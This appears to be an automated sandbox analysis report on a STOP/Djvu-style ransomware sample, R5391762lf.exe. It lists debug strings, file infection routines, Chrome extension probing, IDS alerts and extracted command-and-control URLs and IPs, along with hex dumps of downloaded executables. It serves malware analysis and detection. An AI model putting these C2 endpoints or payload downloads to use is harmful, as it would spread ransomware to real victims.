Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ta\ source: R5391762lf.exe, 00000007.00000003.2102219376.0000000003B45000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101597700.0000000003B45000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049327479.0000000003858000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050729410.0000000003870000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068384745.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: _C:\tofagehu\hiv.pdb source: R5391762lf.exe, 00000000.00000000.1365440142.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000000.00000002.1371228997.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000002.00000000.1368723855.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000005.00000000.1393141835.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000005.00000002.1402790668.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000006.00000000.1394677978.0000000000412000.00000002.00000001.01000000.00000007.sdmp, R5391762lf.exe, 00000006.00000002.1407678085.0000000000412000.00000002.00000001.01000000.00000007.sdmp, R5391762lf.exe, 00000007.00000003.1491373512.00000000097E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681707652.0000000003469000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1621610422.0000000003469000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\re\ source: R5391762lf.exe, 00000007.00000003.2163523307.000000000394E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2148622885.0000000003909000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147135864.00000000038B9000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161507868.000000000391E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2146207325.00000000038A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Y source: R5391762lf.exe, 00000007.00000003.2160881212.00000000038A9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068464910.0000000003838000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079953062.000000000382C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\BlB- source: R5391762lf.exe, 00000007.00000003.2135149537.00000000033A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\AC\Temp\wy\ion Data\Application Data\Application Data\Microsoft\input\en-ZW\\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\2a source: R5391762lf.exe, 00000007.00000003.2163523307.000000000394E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2148622885.0000000003909000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147135864.00000000038B9000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161507868.000000000391E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2146207325.00000000038A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\\\T source: R5391762lf.exe, 00000007.00000003.2079190952.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2078852071.0000000003429000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2083952112.000000000346D000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067121029.0000000003429000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: load_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\M source: R5391762lf.exe, 00000007.00000003.2099831348.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101510258.000000000370A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2081263289.000000000373B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946934767.00000000036FF000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2100414663.0000000003703000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2102557757.0000000003712000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049970590.000000000370B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079360767.00000000036F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\AC\ source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2100295097.000000000397E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2077993512.000000000391E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\H\* source: R5391762lf.exe, 00000007.00000003.1682135563.000000000315F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682296747.000000000316C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682038409.000000000315E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1684204652.0000000003170000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682185359.0000000003163000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: QNBBNQ~1.BGJQNBBNqWD9F_Blep-UqQSqnMp-FI[1].css.bgjs06avERkAqfuwcXY6H5w8dtNc[1].css.bgjst44F3556BE808F99573969118A8E36879BA1ADA6Ction Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.2079953062.000000000382C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\db source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050202443.00000000034AD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1947878317.00000000034AF000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050850721.00000000034C5000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049890930.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ata\ source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101371339.0000000003858000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079953062.000000000382C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\ source: R5391762lf.exe, 00000007.00000003.2101462932.0000000003691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\ source: R5391762lf.exe, 00000007.00000003.2080570314.00000000034B3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2078665185.0000000003491000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2066983991.00000000034D5000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2103034298.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2098976504.00000000034B3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2080800658.00000000034DD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*F source: R5391762lf.exe, 00000007.00000003.2135261521.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2135214422.00000000034C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\J source: R5391762lf.exe, 00000007.00000003.2161457141.0000000003AA1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147352148.0000000003A91000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\e\MSO source: R5391762lf.exe, 00000007.00000003.2049970590.000000000370B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\te\ source: R5391762lf.exe, 00000007.00000003.2161241305.00000000037BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\ source: R5391762lf.exe, 00000007.00000003.1681931238.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681857238.0000000003192000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.2162329285.000000000384C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2162135110.00000000037FD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161241305.00000000037BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\y\\ source: R5391762lf.exe, 00000007.00000003.2136464726.000000000379F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2146776038.00000000037AF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050202443.00000000034AD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1947878317.00000000034AF000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050850721.00000000034C5000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049890930.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\s\U source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2051158018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2082039763.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2051285855.00000000037C8000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2052379835.00000000037D7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049970590.000000000370B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\P source: R5391762lf.exe, 00000007.00000003.2135081077.0000000003985000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147440371.00000000039A6000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2135303170.00000000039D6000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147135864.0000000003994000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\\ source: R5391762lf.exe, 00000007.00000003.2066700717.000000000319C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: R5391762lf.exe, 00000007.00000003.2149833514.000000000376F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\D source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\* source: R5391762lf.exe, 00000007.00000003.2135261521.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2135214422.00000000034C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\ source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2100295097.000000000397E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2077993512.000000000391E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Y' source: R5391762lf.exe, 00000007.00000003.2162329285.000000000384C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2162135110.00000000037FD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161241305.00000000037BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\^ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050202443.00000000034AD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1947878317.00000000034AF000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050850721.00000000034C5000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049890930.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\Desktop\R5391762lf.exe

System file written: C:\Users\user\AppData\Local\Temp\chrome.exe

Jump to behavior

Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	2_2_00410160
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	2_2_0040F730
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	2_2_0040FB98

Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.8:49710 -> 186.145.236.18:80
Source: Traffic	Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.8:49708 -> 186.13.17.220:80
Source: Traffic	Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.8:49708 -> 186.13.17.220:80
Source: Traffic	Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 186.145.236.18:80 -> 192.168.2.8:49710
Source: Traffic	Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 186.145.236.18:80 -> 192.168.2.8:49709
Source: Traffic	Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.8:49711 -> 186.145.236.18:80
Source: Traffic	Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.8:49711 -> 186.145.236.18:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199673019888
Source: Malware configuration extractor	URLs: http://cajgtus.com/test1/get.php

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 15:37:11 GMTContent-Type: application/octet-streamContent-Length: 296448Last-Modified: Tue, 23 Apr 2024 19:19:16 GMTConnection: closeETag: "662809b4-48600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce d6 de 9e 8a b7 b0 cd 8a b7 b0 cd 8a b7 b0 cd 87 e5 6f cd 90 b7 b0 cd 87 e5 50 cd f6 b7 b0 cd 87 e5 51 cd a6 b7 b0 cd 83 cf 23 cd 83 b7 b0 cd 8a b7 b1 cd f8 b7 b0 cd 3f 29 55 cd 8b b7 b0 cd 87 e5 6b cd 8b b7 b0 cd 3f 29 6e cd 8b b7 b0 cd 52 69 63 68 8a b7 b0 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 47 05 fb 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 e6 00 00 00 30 60 01 00 00 00 00 6d 40 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 61 01 00 04 00 00 00 d6 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 6a 01 00 64 00 00 00 00 40 60 01 66 ef 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 60 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 98 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 e4 00 00 00 10 00 00 00 e6 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 50 74 00 00 00 00 01 00 00 76 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 b5 5e 01 00 80 01 00 00 36 02 00 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 66 ef 00 00 00 40 60 01 00 f0 00 00 00 96 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 24 Apr 2024 15:37:35 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Last-Modified: Mon, 09 Oct 2023 19:50:06 GMTETag: "4ae00-6074de5a4a562"Accept-Ranges: bytesContent-Length: 306688Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 f8 06 6b 72 99 68 38 72 99 68 38 72 99 68 38 cf d6 fe 38 73 99 68 38 6c cb fd 38 6e 99 68 38 6c cb eb 38 fc 99 68 38 55 5f 13 38 7b 99 68 38 72 99 69 38 c9 99 68 38 6c cb ec 38 32 99 68 38 6c cb fc 38 73 99 68 38 6c cb f9 38 73 99 68 38 52 69 63 68 72 99 68 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e d2 b9 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6a 03 00 00 98 3b 00 00 00 00 00 20 05 01 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 3e 00 00 04 00 00 b0 bf 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 68 03 00 64 00 00 00 00 90 3e 00 00 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 b8 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 68 03 00 00 10 00 00 00 6a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 ff 3a 00 00 80 03 00 00 0e 01 00 00 6e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6b 69 63 00 00 00 00 05 00 00 00 00 80 3e 00 00 02 00 00 00 7c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 2f 00 00 00 90 3e 00 00 30 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 